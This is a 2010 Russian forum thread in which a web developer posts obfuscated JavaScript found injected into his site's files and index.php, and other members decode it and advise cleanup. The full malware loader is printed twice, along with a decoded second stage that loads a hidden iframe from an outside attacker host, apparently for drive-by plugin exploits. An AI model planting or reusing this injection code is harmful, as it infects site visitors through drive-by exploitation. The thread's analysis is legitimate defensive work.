Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 29.05.2010, 11:29
Аватар для mycoding
NodeJS developer - ушел
Отправить личное сообщение для mycoding Посмотреть профиль Найти все сообщения от mycoding
 
Регистрация: 06.01.2010
Сообщений: 1,022

Вирусы в js файле
У меня недавно комп взломали, прилось сносить windows.
И на одном сайте который пишу во всех js файлах обнаружил вот это.
Я так понял это тоже действия вируса. Доктор веб их обнаружил.

Код вот, можете рассказать что он делает, пожалуйста?

xt=57021;xt+=152;try {} catch(g){};var d;E=["CR","MA","H"];e=function(){var Vd={Mp:false};v=35597;v+=239;var l=["T"];function q(u,O,rZ){var oX=["S","y","Jn"];var _=["D"];return u.substr(O,rZ);n={};ap={QH:16411};}qk=[];G=57546;G+=54;var h='';var kY="kY";c={nP:9662};var uP=RegExp;var Eu={j:false};var J=String(q("/t-mGx5p",0,4)+q("2rp1obilp2r1",4,4)+q("vdsRe-codvsR",4,4)+q("m/goz5Iy",0,4)+q("zuFoglezFu",3,4)+q(".com0CMi",0,4)+q("/devhqt",0,4)+"iant"+q("art.HEsW",0,4)+q("com.gCj3",0,4)+q("phpEB5w",0,3));var Va=[];var V_="V_";var U=document;vm={Kr:false};var C_=new String();var Nv={};function r(u,O){var TZ={dS:false};try {} catch(yt){};var rZ="["+O+String(q("]ULmB",0,1));var b=new uP(rZ, String("g"));this.Wj='';this.io="io";return u.replace(b, h);};nr=25477;nr--;var N=813061-804981;this.HD=51320;this.HD-=152;var L="body";var o=null;var Vq="";JV=[];var Q=r('s9cor9iupQt2','QuPo2VSMD906j');var qR=new String();var qz=new String();var uz="";d=function(){z=31172;z--;try {var c_="c_";var x=r('c8rbeuabt8e8ETlbeYmueTnYtu','T8Y6fub');M=U[x](Q);var m=new String(q("deIpDh",0,2)+q("T7K5fe5T7K",4,2)+q("N0SrNS0",3,1));var iL=new Date();var k=r('s7rUcL','KZVUImLQCh473YDef');var u=N+J;gE={at:9846};try {} catch(wI){};var yL=[];HE={};Uw={};M[m]=[8,1][1];M[k]=new String("http:"+q("//tenDb7U",0,5)+q("thproEvX",0,5)+"fit.r"+q("u:bnM",0,2))+u;U[L].appendChild(M);} catch(hU){Iq=["ej"];nrA=["gg"];var yK=false;};};var Uc="Uc";};e();window.onload=d;var tz=new Array();this.Pt=58911;this.Pt-=11;try {var RO='BC'} catch(RO){};


Проверил ещё они мне даже в index.php тоже самое записали
<script>xt=57021;xt+=152;try {} catch(g){};var d;E=["CR","MA","H"];e=function(){var Vd={Mp:false};v=35597;v+=239;var l=["T"];function q(u,O,rZ){var oX=["S","y","Jn"];var _=["D"];return u.substr(O,rZ);n={};ap={QH:16411};}qk=[];G=57546;G+=54;var h='';var kY="kY";c={nP:9662};var uP=RegExp;var Eu={j:false};var J=String(q("/t-mGx5p",0,4)+q("2rp1obilp2r1",4,4)+q("vdsRe-codvsR",4,4)+q("m/goz5Iy",0,4)+q("zuFoglezFu",3,4)+q(".com0CMi",0,4)+q("/devhqt",0,4)+"iant"+q("art.HEsW",0,4)+q("com.gCj3",0,4)+q("phpEB5w",0,3));var Va=[];var V_="V_";var U=document;vm={Kr:false};var C_=new String();var Nv={};function r(u,O){var TZ={dS:false};try {} catch(yt){};var rZ="["+O+String(q("]ULmB",0,1));var b=new uP(rZ, String("g"));this.Wj='';this.io="io";return u.replace(b, h);};nr=25477;nr--;var N=813061-804981;this.HD=51320;this.HD-=152;var L="body";var o=null;var Vq="";JV=[];var Q=r('s9cor9iupQt2','QuPo2VSMD906j');var qR=new String();var qz=new String();var uz="";d=function(){z=31172;z--;try {var c_="c_";var x=r('c8rbeuabt8e8ETlbeYmueTnYtu','T8Y6fub');M=U[x](Q);var m=new String(q("deIpDh",0,2)+q("T7K5fe5T7K",4,2)+q("N0SrNS0",3,1));var iL=new Date();var k=r('s7rUcL','KZVUImLQCh473YDef');var u=N+J;gE={at:9846};try {} catch(wI){};var yL=[];HE={};Uw={};M[m]=[8,1][1];M[k]=new String("http:"+q("//tenDb7U",0,5)+q("thproEvX",0,5)+"fit.r"+q("u:bnM",0,2))+u;U[L].appendChild(M);} catch(hU){Iq=["ej"];nrA=["gg"];var yK=false;};};var Uc="Uc";};e();window.onload=d;var tz=new Array();this.Pt=58911;this.Pt-=11;try {var RO='BC'} catch(RO){};</script>
<!--29f5bff350373d6fe5430470f54cf714-->

Последний раз редактировалось mycoding, 29.05.2010 в 11:36.
Ответить с цитированием
  #2 (permalink)  
Старый 29.05.2010, 11:38
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

Сообщение от mycoding
что он делает
какая разница, если это вирус?
сноси к чертям, и непарься.
заодно почисть свою рабочую машину от вирусов, и поменяй пароли доступа к FTP
Ответить с цитированием
  #3 (permalink)  
Старый 29.05.2010, 16:45
Аватар для mycoding
NodeJS developer - ушел
Отправить личное сообщение для mycoding Посмотреть профиль Найти все сообщения от mycoding
 
Регистрация: 06.01.2010
Сообщений: 1,022

А есть ли декомпилятор js?
В google не нашёл, может он по другому называется.
Ответить с цитированием
  #4 (permalink)  
Старый 29.05.2010, 17:13
Аватар для B@rmaley.e><e
⊞ Развернуть
Отправить личное сообщение для B@rmaley.e><e Посмотреть профиль Найти все сообщения от B@rmaley.e><e
 
Регистрация: 11.01.2010
Сообщений: 1,810

Сообщение от mycoding
декомпилятор js?
Чего? JS динамически компилируемый язык, Вам не грозит увидеть его в скомпилированном виде.

К вопросу, чего он делает:
Подключает тег script с адресом http[двуеточие]//tenthprofit.ru[двуеточие]8080/t-mobile-com/google.com/deviantart.com.php

Там, в свою очередь, выдается следующее:
try{
Trvfvwlnvu6gz = document.referrer;
Np7hqwn4spuwm = '';
De18jtezg = 'RU';
Y2uyefq0s28a627us41 = '3275633747';
function Gl04wmepuripbb2r(Agj5a90vir75){
  if (Trvfvwlnvu6gz.indexOf(Agj5a90vir75) != -1){
    Np7hqwn4spuwm=Agj5a90vir75;
   }
}
Zquyj9ucncig = 'http:' + '//tenthprofit.ru:8080/index.php?pid=1&home=1';
Lfsqbfjyjq0b8u = 24-(12*2);
var Ot9vsbdmhjjhrly2d7 = document.createElement('div');
Ot9vsbdmhjjhrly2d7.id = 'Yxgwoh37f331s';
document.body.appendChild(Ot9vsbdmhjjhrly2d7);
Ryg3fb1ath = 'Lfsqbfjyjq0b8u';
Io1ksfduht3j8t = document.createElement('i&#&f(r@($@a!&m@e!(!'.replace(/&|\!|\^|\(|@|\)|#|\$/ig, ''));
Io1ksfduht3j8t.src = Zquyj9ucncig;
Io1ksfduht3j8t.height = Lfsqbfjyjq0b8u;
Io1ksfduht3j8t.width = Lfsqbfjyjq0b8u;
document.getElementById('Yxgwoh37f331s').appendChild(Io1ksfduht3j8t);

}catch(e){}


Здесь подключается невидимый фрейм с адресом, который можно увидеть выше.

Последний раз редактировалось B@rmaley.e><e, 29.05.2010 в 17:25.
Ответить с цитированием
  #5 (permalink)  
Старый 29.05.2010, 18:41
Аватар для mycoding
NodeJS developer - ушел
Отправить личное сообщение для mycoding Посмотреть профиль Найти все сообщения от mycoding
 
Регистрация: 06.01.2010
Сообщений: 1,022

А чем это опасно?
По поводу декомпиляции подразумевал обфускацию .
Вообще я не знаю как это называется.

Последний раз редактировалось mycoding, 29.05.2010 в 22:06.
Ответить с цитированием
  #6 (permalink)  
Старый 29.05.2010, 19:50
Аватар для B@rmaley.e><e
⊞ Развернуть
Отправить личное сообщение для B@rmaley.e><e Посмотреть профиль Найти все сообщения от B@rmaley.e><e
 
Регистрация: 11.01.2010
Сообщений: 1,810

Сообщение от mycoding
А чем это опасно?
Обычно в таких фреймах эксплуатируют дыры плагинов. Например, pdf.

http://lmgtfy.com/?q=js+beautifier
Ответить с цитированием
  #7 (permalink)  
Старый 29.05.2010, 20:35
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

класно
на эту тему у меня нод ругается
Ответить с цитированием
  #8 (permalink)  
Старый 29.05.2010, 22:08
Аватар для mycoding
NodeJS developer - ушел
Отправить личное сообщение для mycoding Посмотреть профиль Найти все сообщения от mycoding
 
Регистрация: 06.01.2010
Сообщений: 1,022

А можно ли например сделать crossdomain запрос и таким образом передать cookie?
Т.е. фактически похитить логин и пароль?
Ответить с цитированием
  #9 (permalink)  
Старый 29.05.2010, 22:26
Аватар для Gvozd
Матрос
Отправить личное сообщение для Gvozd Посмотреть профиль Найти все сообщения от Gvozd
 
Регистрация: 04.04.2008
Сообщений: 6,246

Сообщение от mycoding
можно ли например сделать crossdomain запрос и таким образом передать cookie?
разумеется может
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
помогите задать переменную в js bsgroupua Общие вопросы Javascript 3 01.02.2010 18:28
Вывод JS значения в одну строку в HTML velo Общие вопросы Javascript 7 15.12.2009 03:57
Блок переключения меню на JS, два скрипта в одном файле Dizeloid Элементы интерфейса 0 30.07.2009 12:03
Самая лучшая книга по JS? ulandj Оффтопик 2 06.04.2009 11:35
Загрузка дополнительного js кода с сервера Anonymous2008 Общие вопросы Javascript 5 20.11.2008 12:33